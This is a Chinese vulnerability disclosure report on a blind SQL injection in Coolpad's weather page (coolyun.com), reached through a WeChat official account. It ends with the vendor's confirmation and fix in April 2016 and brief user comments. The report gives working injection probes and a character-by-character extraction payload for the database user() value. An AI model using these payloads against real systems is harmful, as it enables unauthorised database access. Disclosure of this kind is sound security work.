酷派手机最美天气某处SQL注入（有趣的微信公众号注入）

http://www.coolyun.com/guide/weather.html

首先验证注入：

成都' and '1'='1
 成都' and '1'='2

注入存在.

下面以user信息为例来进行获取：

读了下user长度...发现有20位...

成都' and (select length(user()))=20-- and 'a'='a

之后就开始一位一位来：

成都' and ascii(substring(user(),1,1))>40-- and 'a'='a

...最终终于全部测出来了

即数据库的用户名为：

一切输入都是有害的

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2016-04-22 15:18

厂商回复：

感谢提供，酷派已成立SRC，欢迎提交到SRC，奖励丰厚，谢谢。

最新状态：

2016-04-22：http://security.coolpad.com

2016-04-25：此漏洞已于2016-4-22 17:32修复。

1. 2016-04-22 01:54 | 带头大哥 ( 普通白帽子 | Rank:879 漏洞数:258 | |任意邮件伪造| |目录遍历| |任意文件读取|...)

   0

   支持我大90的表弟..

   1# 回复此人

2. 2016-04-22 01:56 | Adoubi ( 实习白帽子 | Rank:74 漏洞数:16 | Adoubi)

   0

   屌

   2# 回复此人

3. 2016-04-22 09:25 | V1ct0r ( 普通白帽子 | Rank:375 漏洞数:81 | 生活不止眼前的苟且,还有黑客和远方.)

   0

   @带头大哥 ：p

   3# 回复此人

4. 2016-06-08 08:40 | 池寒 ( 路人 | Rank:12 漏洞数:6 | Enrich your life today, yesterday is his...)

   0

   还能这么玩。

   4# 回复此人

5. 2016-06-11 09:40 | 深蓝 ( 普通白帽子 | Rank:1174 漏洞数:256 | 我就静静的看着你装逼，我就是不理你。)

   0

   活久见

   5# 回复此人